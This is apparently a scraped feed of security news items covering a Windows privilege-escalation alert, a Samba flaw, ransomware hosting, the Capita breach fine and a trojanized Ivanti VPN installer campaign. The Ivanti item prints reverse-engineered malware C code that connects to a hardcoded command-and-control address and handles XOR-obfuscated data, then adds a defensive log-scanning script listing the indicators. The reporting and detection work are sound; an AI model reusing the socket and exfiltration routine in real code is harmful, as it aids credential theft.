-
Scaling the SOC with AI – Why now? Security Operations Centers (SOCs) are under unprecedented pressure. According to SACR’s AI-SOC Market Landscape 2025, the average organization now faces around 960 alerts per day, while large enterprises manage more than 3,000 alerts daily from an average of 28 different tools. Nearly 40% of those alerts go uninvestigated, and 61% of security teams admit
-
CISA has added a critical Microsoft Windows vulnerability to its Known Exploited Vulnerabilities catalog, warning organizations that threat actors are actively exploiting it in real-world attacks.
Identified as CVE-2025-59230, the flaw stems from improper access control in the Windows Remote Access Connection Manager service.
This local privilege escalation vulnerability allows an authorized user, such as someone with initial system access, to gain higher-level permissions, potentially compromising entire networks.
Microsoft disclosed the issue in a recent security update, confirming that it affects multiple versions of Windows, including Windows 10, 11, and Server editions.
The vulnerability, classified under CWE-284 for improper access control, doesn’t require sophisticated remote hacking skills; instead, it exploits weaknesses in how the system handles remote access connections.
Security researchers note that once exploited, attackers can manipulate system files, install malware, or pivot to other machines on the network.
While it’s not yet confirmed for use in ransomware campaigns, experts caution that its simplicity makes it a prime target for cybercriminals seeking initial footholds.
CISA’s alert, released on October 15, 2025, emphasizes that federal agencies must patch the vulnerability by November 5 or face compliance risks under Binding Operational Directive 22-01.
“Organizations ignoring patches expose themselves to privilege escalation chains that could lead to data breaches or lateral movement.”
The vulnerability’s severity is underscored by its CVSS v3.1 base score of 7.8, rated high due to the ease of local exploitation and potential for complete system takeover.
Affected components include the RasMan service, which manages VPN and dial-up connections. Microsoft has released patches via its October 2025 Patch Tuesday updates, urging immediate deployment.
For cloud-based Windows instances, CISA recommends aligning with BOD 22-01 guidelines to secure virtual environments.
Mitigations
To counter the threat, IT administrators should prioritize applying Microsoft’s security updates, disabling unnecessary Remote Access services if not in use, and implementing least-privilege access controls.
Tools like Microsoft Defender for Endpoint can help detect exploitation attempts through behavioral monitoring.
If patches aren’t feasible, such as on air-gapped systems, CISA advises isolating affected machines or discontinuing the vulnerable product altogether.
As cyber threats evolve, this incident highlights the importance of timely patching in Windows ecosystems. With exploitation ongoing, unpatched systems remain a ticking time bomb for enterprises worldwide.
The post CISA Warns Of Windows Improper Access Control Vulnerability Exploited In Attacks appeared first on Cyber Security News.
-
Cybersecurity researchers have disclosed details of a new campaign that exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple
-
An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers have registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.
Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.
The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
Example of Bing search results with a poisoned website (Source – Zscaler)
Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals, particularly from Bing, are shown the malicious download button; the pages inspect the HTTP Referer header to cloak their true intent from anyone who visits them directly.
Once downloaded, the MSI installer drops two malicious DLLs, dwmapi.dll and pulseextension.dll, signed with a certificate issued by a legitimate certificate authority to further bypass security controls.
The threat actor’s fake Ivanti Pulse Secure download website (Source – Zscaler)
These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.
Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C code snippet illustrates the socket setup and data exchange routine:

    #include <winsock2.h>
    #include <ws2tcpip.h>   /* inet_pton */

    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(8080);                       /* hardcoded C2 port */
    inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);  /* hardcoded Azure-range C2 address */
    connect(sock, (struct sockaddr *)&addr, sizeof(addr));

    char buf[0x34] = {0};          /* 52 bytes: 48 are received, 52 are sent back */
    extern const char key[0x30];   /* XOR key; its value is not shown in the write-up */

    // Receive 48 bytes
    recv(sock, buf, 0x30, 0);
    // XOR deobfuscation
    for (int i = 0; i < 0x30; i++) buf[i] ^= key[i];
    // Send 52-byte obfuscated payload
    send(sock, buf, 0x34, 0);

Reverse-engineered code showing network communication logic (Source – Zscaler)
After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path /incomeshit, a colloquial label for exfiltration channels.
Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.
Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
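The monitoring advice above (outbound connections to unfamiliar Azure IPs on port 8080, installer checksum validation) can be turned into a small detection pass. The following is an added example written for this summary; it is not Zscaler's or Ivanti's code. It assumes a simple constructed proxy/firewall log line format (timestamp, source, destination:port, HTTP method or "-", host and path), an empty allowlist of approved port-8080 destinations, and a vendor-published SHA-256 value supplied by the caller; the sample log lines are constructed, and the indicators (4.239.95.1:8080, /incomeshit, the two lookalike domains) are the ones reported in the article.

```python
import hashlib
import ipaddress
import re
from dataclasses import dataclass, field

# Indicators reported in the article: C2 endpoint, exfiltration path, lookalike domains.
C2_IP = ipaddress.ip_address("4.239.95.1")
C2_PORT = 8080
EXFIL_PATH = "/incomeshit"
LOOKALIKE_DOMAINS = frozenset({"ivanti-pulsesecure.com", "ivanti-secure-access.org"})

# Assumption: destinations this network legitimately reaches on port 8080.
# Left empty here, so every outbound 8080 connection is surfaced for review.
APPROVED_PORT_8080_DESTINATIONS = frozenset()

# Assumed (constructed) log line format:
#   <timestamp> <src_ip> -> <dst_ip>:<dst_port> <method|-> <host><path|->
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>[\d.]+):(?P<port>\d+) "
    r"(?P<method>\S+) (?P<host>[^/\s]+)(?P<path>/\S*)?$"
)


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def inspect_line(line: str):
    """Return a Finding for a log line that matches an indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or foreign format: skip rather than crash
    dst = ipaddress.ip_address(m["dst"])
    port = int(m["port"])
    path = m["path"] or "/"
    reasons = []
    if dst == C2_IP and port == C2_PORT:
        reasons.append("connection to reported C2 endpoint")
    elif port == C2_PORT and str(dst) not in APPROVED_PORT_8080_DESTINATIONS:
        # Cloud-hosted C2 blends into "benign" Azure traffic, so pin on the
        # port plus an allowlist rather than trusting the provider's range.
        reasons.append("outbound 8080 to destination not on allowlist")
    if m["method"] == "POST" and path == EXFIL_PATH:
        reasons.append("POST to reported exfiltration path")
    if m["host"].lower() in LOOKALIKE_DOMAINS:
        reasons.append("contact with reported lookalike domain")
    return Finding(line, reasons) if reasons else None


def scan(lines):
    """Run inspect_line over an iterable of log lines, keeping hits in input order."""
    return [f for f in (inspect_line(ln) for ln in lines) if f is not None]


def verify_installer(data: bytes, expected_sha256: str) -> bool:
    """Checksum validation: compare an installer's SHA-256 with the vendor-published value."""
    return hashlib.sha256(data).hexdigest() == expected_sha256.strip().lower()


# Constructed sample log lines (not real telemetry).
SAMPLE_LOGS = [
    "2025-10-07T09:12:01Z 10.0.0.21 -> 4.239.95.1:8080 - -",
    "2025-10-07T09:12:03Z 10.0.0.21 -> 4.239.95.1:8080 POST 4.239.95.1/incomeshit",
    "2025-10-07T09:11:55Z 10.0.0.21 -> 203.0.113.10:443 GET ivanti-pulsesecure.com/download",
    "2025-10-07T09:10:00Z 10.0.0.22 -> 198.51.100.5:443 GET example.com/",
    "2025-10-07T09:09:30Z 10.0.0.23 -> 192.0.2.9:8080 GET internal-proxy.example/",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f.line, "->", "; ".join(f.reasons))
```

The first two sample lines reproduce the sequence described above (a raw handshake on 8080 followed by the POST to /incomeshit) and are flagged on the specific endpoint; the last line shows the broader rule, which reports any port-8080 destination not on the allowlist, because the article's point is that the Azure address alone would look benign.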
The post Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware appeared first on Cyber Security News.
-
Qilin ransomware–an increasingly prolific ransomware-as-a-service (RaaS) operation–has intensified its global extortion campaigns by exploiting a covert network of bulletproof hosting (BPH) providers. These rogue hosting services, often headquartered in secrecy-friendly jurisdictions and operated through labyrinthine shell-company structures, allow Qilin’s operators and affiliates to host malware, data leak sites, and command-and-control infrastructure with near impunity. In […]
The post Qilin Ransomware Leverages Ghost Bulletproof Hosting for Global Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
A newly disclosed vulnerability in Samba’s WINS server hook script enables unauthenticated attackers to run arbitrary commands on affected domain controllers. This critical flaw, tracked as CVE-2025-10230, carries a maximum CVSSv3.1 score of 10.0, reflecting its ease of exploitation and devastating impact on confidentiality, integrity, and availability. Overview of the Vulnerability The issue arises when […]
The post Critical Samba Flaw Allows Remote Attackers to Execute Arbitrary Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
The UK’s Information Commissioner’s Office (ICO) has imposed a £14 million fine on outsourcing giant Capita following a major cyber attack in 2023 that exposed the personal data of 6.6 million individuals.
This penalty, split as £8 million to Capita plc and £6 million to Capita Pension Solutions Limited, marks one of the largest data protection fines in recent UK history.
The breach highlighted critical shortcomings in corporate cybersecurity, affecting pension schemes and sensitive personal information across hundreds of organizations.
The incident unfolded on March 22, 2023, when an employee unwittingly downloaded a malicious file onto a company device, granting hackers initial access to Capita’s network.
Despite a high-priority security alert triggering within 10 minutes and some automated responses activating, Capita failed to isolate the infected device for 58 hours, far exceeding their one-hour target response time.
This delay allowed the attackers to deploy malware, escalate privileges, and move laterally across systems, exfiltrating nearly one terabyte of data between March 29 and 30.
By March 31, ransomware was deployed, resetting user passwords and locking Capita staff out of their systems, which disrupted services for clients, including local councils, the NHS, and pension providers.
Capita Data Breach Exposes Sensitive Data
The stolen data encompassed pension records, staff details, and customer information from over 600 organizations, with 325 pension schemes directly impacted.
Sensitive elements included financial data, criminal records, and special category information such as health or ethnic details for some victims.
The ICO received at least 93 complaints from affected individuals reporting anxiety and stress over potential identity theft and fraud.
The ICO’s probe uncovered multiple failures in Capita’s data protection practices, violating UK GDPR requirements for secure processing.
Notably, Capita lacked a tiered administrative account model, enabling easy privilege escalation and unauthorized network traversal, weaknesses that had been flagged in prior assessments but left unaddressed.
Their Security Operations Centre was chronically understaffed, consistently missing response targets for alerts in the months leading up to the attack.
Additionally, critical systems handling millions of records underwent penetration testing only at commissioning, with no follow-ups, and findings remained siloed within business units rather than organization-wide.
These lapses left vast amounts of personal data exposed to significant risk, amplifying the breach’s scale.
Information Commissioner John Edwards emphasized that “Capita failed in its duty to protect the data entrusted to it by millions of people,” underscoring the preventable nature of the incident through basic measures like the principle of least privilege and timely alert responses.
Originally facing a £45 million provisional fine, Capita negotiated it down to £14 million via a voluntary settlement, admitting liability without appeal.
Capita offered 12 months of free credit monitoring to affected individuals through Experian, with over 260,000 activations, and established a dedicated support hotline.
CEO Adolfo Hernandez acknowledged the event as part of a wave of attacks on UK firms, reaffirming commitments to data security for public and private sector clients.
The ICO urged organizations to follow NCSC guidance on preventing lateral movement, conduct regular risk assessments, and prioritize security staffing.
With ongoing legal actions from victims, Capita’s total costs may yet rise, emphasizing accountability in an era of escalating ransomware threats.
The post Capita To pay £14 Million For Data Breach Exposes 6.6 Million Users Personal Data appeared first on Cyber Security News.
-
Penetration testing helps organizations ensure IT systems are secure, but it should never be treated in a one-size-fits-all approach. Traditional approaches can be rigid and cost your organization time and money – while producing inferior results. The benefits of pen testing are clear. By empowering “white hat” hackers to attempt to breach your system using similar tools and techniques to
-
The UK’s Information Commissioner’s Office has imposed a £14 million penalty on Capita following a major cyber attack in March 2023 that exposed the personal information of 6.6 million people. The fine was split between Capita plc, which received £8 million, and its subsidiary Capita Pension Solutions Limited, which was fined £6 million. The breach […]
The post Capita Fined £14 Million After Data Breach Exposes 6.6 Million Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
In a recently uncovered campaign, the Mysterious Elephant advanced persistent threat (APT) group has executed a sophisticated series of intrusions against government and foreign policy agencies across the Asia-Pacific region. The latest operations, active since early 2025, rely on custom-built malware modules and modified open-source utilities to target and siphon off documents, images, and archives […]
The post Mysterious Elephant APT Breach: Hackers Infiltrate Organization to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


